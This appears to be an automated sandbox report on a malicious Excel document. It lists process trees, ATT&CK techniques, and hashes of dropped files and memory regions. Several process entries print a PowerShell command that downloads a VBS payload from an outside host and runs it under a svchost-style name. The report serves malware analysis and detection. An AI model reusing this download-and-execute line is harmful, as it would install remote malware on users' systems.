"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1796

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4788

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3064

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4568

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4064

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
471B

MD5
9cd46028937de7559d186e8ed0f7aedc

SHA1
ff97f7c4e212330c7f6b292a02fe4baeef301b46

SHA256
b9a23efdf64cf8701816b2dbc9e3ffa4295d229d4a1eac98cdd19e273f92f78c

SHA512
20467a151b1c1d20e17d5788451d30f988f2ccc21fe5249f5b945a0f8bca063dbcb8f54d6fd923c6aa2918312d3843bc94a4e7937a92c953cc97d888fa896485

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A

Filesize
412B

MD5
8bab843b315d4d6a98682945bae9f068

SHA1
3d54253443d93aac9f6c1d44625d1d27ce71d17c

SHA256
e743c47b7d8d87e4c195a0937f3c9974107b64a28ea81f31c146d97461911a39

SHA512
48a27e772844e989b69157f7321a7c1a788ac6b018c094b76875c64c01b232d4a63205a5cf2d27f81889843d220d4a7d4b48be8acbf416104ec8650337a2ed28

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B476FB77-F583-4347-87E3-31A20913321E

Filesize
171KB

MD5
b9a1d631e03520335a2bfda983feb23a

SHA1
549b54bc69c34f8c3915484ea7d2db78c7c841ac

SHA256
fc2d4f813acdae479d73af2833faf96485d02c097508b511ef4459558cd711a5

SHA512
e3d19e70546eb8a4114b9d3d9754eba23f12b2c198d47db534df74ac0c3ea130ea3961ffa72df5cfb067293ecad83ced46556e15e53208f929872a1f75a81793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
717KB

MD5
0f623c5348eb7442cf1e8302db9b6024

SHA1
c6d41e75e2dd5407fbc2b13a79a9797e62bab4bf

SHA256
b0d33271c119634b7e4a3a68a2b9b5f38bb85940b4e31c7ea51d4074d0a2872e

SHA512
56376f05806acceb3d2ae71cec5afa8bb6ee9cd82f15f77e4f69474a61ed5c4c00cbc5d3b081522c629e63ec64d300309bca4b7905c5b9602dc11119785a8a7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
085ebd119f5fc6b8f63720fac1166ff5

SHA1
af066018aadec31b8e70a124a158736aca897306

SHA256
b8411fe8ec499074fca9047f6983d920279e84ddf3b02b2dd5c08cf07ec44687

SHA512
adb0522830db26123347cb485c43b156f5c888510e52091ba0fafc22b650ad29630c027746c920321905c28259dce7ff63dded93a79efddd5567c68312117875

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
33eea2792b9fa42f418d9d609f692007

SHA1
48c3916a14ef2d9609ec4d2887a337b973cf8753

SHA256
8f7807c324626abc2d3504638958c148e2e3f3e212261f078940cf4c5f0c4fbb

SHA512
b2dbfcdf2599c38c966c5ebce714a5cd50e2f8b411555acf9f02b31b9c29b8ab53a9afa9d32bab87a06e08f8b2c7818d600773f659a058c8af81c50be7f09b95

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
81f7ddbfffbcb29fe5a543b3a1e438b8

SHA1
d16b194470fe1404be5d9037fe9bccce3677e58f

SHA256
df476fccec8b974e8f602f490220c3674c6c4babf5d8050db2f75e80ce09d076

SHA512
9a3b6dab440240cc4ce8c5ab7669cc4d14bdb3013da26760411f099c2a59f6daa42a860eec6c6033378a49355e54a50177b68825d8c912286be49976b22fa101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
188KB

MD5
533f56569296708ca64d0f571eac9b4d

SHA1
092b120ebaafc23947af62ba4b55dc31d8e030d4

SHA256
dcbf9195388e2116e4db919a0d73390a57118ab281bcac1073b7a6108e088e8b

SHA512
cdaa1ddfcb29b39037349280a0cbfb55cfdd067eee7157c9ce3d7a89d92cefbfb0d06ba88ce87a854e6b0e3ac71978b60a9a83100dfd5d38f42acb67f5e91ab5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
6c4bc1a381ebf8989439b30f605478b7

SHA1
c45cbf2c31eec36d0caa069cdebb99f67089fdac

SHA256
f5aa29170bfabd34f19e0f2a68108328bebb7facb38e718316f9d14f45a40f22

SHA512
27a90092f5e31b5dd2106b6bfe316c5c204cad3e468f417393760fed9f1e589134ca1c1e8a384319b57abe622b3d7c4bb883bcf3f496d9707196aa72f75447eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
7e5fca61050aee55ab8948cfdd9d5325

SHA1
e4c8e26fd7c6e7daa4cd518998dfcadab2578a6a

SHA256
18adbf1ca8c9f369ae51846cb670641127747ebbb23a2e2970bc70556cb84618

SHA512
4b534190b98cc3f4d8cb668b5be6b631fab299c1b6f61f8dc3f90e3a3c178702b4468a6100252228f1b9dbed63e902ecda8f51ca3fc442135798571960df7182

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
3715957839a3c2285521fa4a8c2cab42

SHA1
f07d05ec008f3addac19893fde4c01937f3bb264

SHA256
4f4f21aee145781f6a5db396a2ca78c91e965f1e17b9aeee933cf9cff939f5dd

SHA512
8181dc0614ff6646e5e382ca5a38d7f3a1dc9fba22b959ea9a8a20a6c1eab573113d511b870cdb56e12aa99e2b3157119cd2a8f82d473a6836ce167385368494

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
75ac93e50c2e677e716b28cda34d86bf

SHA1
73540fa28dc29d9e73e9f8656d95a86cd5cb03bf

SHA256
c86ba3cb610e9722fce2f4c01113eee60338a1c6c04024ad1424ee685e30b54d

SHA512
8e7e4440611320e4559f7c018b1ed334af1ef20fa233b0f9aaea4f1a63b2cf9530f62eeadb8fa5fbe37d48196737c1d89bfde7bef13bb1a8e2548c586a8d0fe7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
188KB

MD5
c72f4ba55528697e7c486e1b4223e36a

SHA1
a58d102e61eee7b6152758173acc70f1e168067f

SHA256
bc23a7a1f3f7cab9c13c931e30ff616478145d39a5f5b0d347ccb65c9fab63f2

SHA512
902ab41665bacfa714f4c886679eb6b69ac4e139eb4b935b482408001ceff7d067131efac29ad610bc0eae82fb309b35fc7f827938f0060172d93508bac59263

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
d699172f4ba21ddafd31d91c8b44d11f

SHA1
81ea31c1038a160ffb7230ae53ae4ee301ad7df0

SHA256
5ccbf2ba2671b7fb4e6320f9b67c3455cc1a10ac29eb9d17aee13e7e12b82b98

SHA512
e62695632572cd759d6da492f134978c4aff49037bf7f5a8a5d1535f3b2c4915d361a8dac48dd2db3e0ad012b60477c9de8fbe58c5bac3ba96df9aabae4ec279

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
8ed222dba03e6909084482533ced1eef

SHA1
2709dabfb7613af28fe56b51e0ccacc6efd1907c

SHA256
044045c2f597f34486d599742904c3ec2149d6f4bfddc6fbf66e30dbaafe7c9a

SHA512
a38e0b40506c594528b7530dbd6583d3a9fc320ad1ee63038190a2808abdeb29c8138be6cb89ad7384952549b84d7e0974aeb62735106d55b39bbc9668f28b05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
8f9a04a690dcd7573fb994b3d79ec49d

SHA1
365c22c488e14593250bf6cdbba401bb3d1b3c41

SHA256
b19645bd0bcf36d0811d3465aada8982e73d9d083694137c22d7f230ee8e6243

SHA512
6646fd30f589d72b78f9f60dd5889d7b3703df69fc54441d4989dabf2ff8d70e3fe804aeaa921969517bf984f57208ae1a1808903eaf50682d049d3acc38c8d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
031161c2aaabef973f3588a7110f1dbb

SHA1
61fcfb7eeb08bebf68538b6b9abddb061cbd0a6f

SHA256
4c7b8590bb9a04f09335614991bbbfff2b789a5cb5ce31bbd00a8152b2977d3f

SHA512
f44edb940800d343bc6bafdda30088952b81bf8b7b360be0814ff1a9f318a00719898d39a12632f2851709b9a44aecf312ea533e96b4451baeb78e4ea2b7f21e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
e4d50e18180f477e499d321ea0fd9502

SHA1
7aa0a89c518d076faa7dff8f9feb5713da219be7

SHA256
98b9ce84497976bad5a5fd5edbff6b37abf987402cdd97ff3924f7e8c75ef8c0

SHA512
4fb01de444894363f52bb9c4128f175abc9c67cfabf51227a1693e67ede80d24f8cfef658e238ad655ac31b046548e527995b7c81b23f97267439b51dd88cdd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db

Filesize
24KB

MD5
af00b0ec9af36dbeaff2da64c3ca8c95

SHA1
fec90d17857204c0d283a59481224c063a060b35

SHA256
6391c6fe81476f1f26d8d6a1e4c0d44abc7394e6d90e44997acfe1d8c2bb78eb

SHA512
9c56a08d211c90e9970bd393320ded0c7a6289cc6cca86da59ce0b489e843f399a4259b8e481a462ae2a0d626b3f79ee880ea1545f278788983f8f83bef1e6a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

Filesize
2KB

MD5
2cc2f5852a062f798685c946578fedcc

SHA1
2d9a97d6b738da1bdc795aa73ed24c5f4784914c

SHA256
66cb7156ff7f9ef831d002a1b79175bb4d77222cc4fea5549c771a31daf2beaf

SHA512
6efedf51598623034e70cfc3eff43773ad5cc9ee10c55934a3e62a6f308cfc207d29f10a08d296ffe8314a9769912f5d9520de15f8fd35bb5cb0e9edeafece74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\49dbe2955480c7f6ef8cec9c4320c9868d9293fd.tbres

Filesize
2KB

MD5
33d4e44145cfbeb49072f8cc0015cb57

SHA1
25767f338d6b487b0c8ad39089470e62b52b18cd

SHA256
275ed77342437fb385e9d5e39773f929d27da46b558e3991327b6bb071814447

SHA512
c036245c0b4b37e767aaa6f810fa6eee4839405ebdb1a4f89f9d1d757d845fe02b5cd6b9723d1fed2033bbb9305fe1eb05ff46347dfd4cc0b272488bee699b12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e42bec1f8f4c3705f1df36c21c85531

SHA1
c9d6aac3c1b16ed12f22185ebdc9f921cd396d14

SHA256
f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2

SHA512
d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
80294390a9adb8a8efbd18d56a1b6bfd

SHA1
446953abb38d58511e27c5beed2bf4df7100dca9

SHA256
73003db0a49a5ba5e8e9b47605a3d73302ca1d5501f8baec1772342d3d1ca783

SHA512
175f16b9dffe634fd44c9c5f1596ead4a1d79ea5fb6bc39c94e463b0b2de629e1572280445f3e78dd1343d927901f6803b804011ada36cd8b8f89f9218103e93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
79081ea44704efebd827bf4a676f828b

SHA1
af627fcc68a38f23aa3fed95d3adcf6d77363451

SHA256
4884b84a285be819491b6f2c371d6e7f0c5d7ddcfc1029d4cabe39c23e088330

SHA512
3051f7dad33b315e81fe77d7b91980428ed385ff4b8ab52f3bd8516bdbc1b9db2291b623a148ea721aa429cd2513621277fcc668a4b0029b5a6155d871f7b871

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
018c97296d9be5615238448d42a2780e

SHA1
ece105fab3e890346e4058f1f7bbf2e2b8f46599

SHA256
157b0c55dce8ce8532a6ff91f1484f3ad4fb399158c6f3ee159cb5ae729a3f11

SHA512
c2689403cdfd49975d087ce0a83184062309bf80833b477e490f499d8280e8ebdb8dec830daedaf1fa07070a4899b88320e397adf93e766bccaa4994682ff33c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a430417722ea0bc392163825304c5f99

SHA1
44a20fad79d601cf73a7d78279fe1ee71959e75b

SHA256
b61a692728cd41f0e3dee53de8c620121553e5b3de9bd4cbfc4d7fff1c9b7bbe

SHA512
1466fedea934bb3ef4e716e82a6c1e7cc62ebbd20f820189c7fa70a2530b7d67005e5aed702b0c69a20a5b91bd66a1dfb72451590cbaa88a7e1d7c5b2f9a6bb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvizkfdv.s50.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2924-36-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/2924-35-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/2924-30-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/2924-115-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/2924-118-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/2924-117-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/2924-116-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/2924-119-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/3688-63-0x0000021E9CC00000-0x0000021E9CC22000-memory.dmp

Filesize
136KB

Download
memory/4332-15-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-110-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-71-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-70-0x00007FFE7820D000-0x00007FFE7820E000-memory.dmp

Filesize
4KB

Download
memory/4332-6-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-7-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-8-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-14-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-0-0x00007FFE7820D000-0x00007FFE7820E000-memory.dmp

Filesize
4KB

Download
memory/4332-18-0x00007FFE35F80000-0x00007FFE35F90000-memory.dmp

Filesize
64KB

Download
memory/4332-17-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-16-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-9-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-13-0x00007FFE35F80000-0x00007FFE35F90000-memory.dmp

Filesize
64KB

Download
memory/4332-11-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-12-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-10-0x00007FFE78170000-0x00007FFE78365000-memory.dmp

Filesize
2.0MB

Download
memory/4332-5-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/4332-3-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/4332-4-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/4332-2-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download
memory/4332-1-0x00007FFE381F0000-0x00007FFE38200000-memory.dmp

Filesize
64KB

Download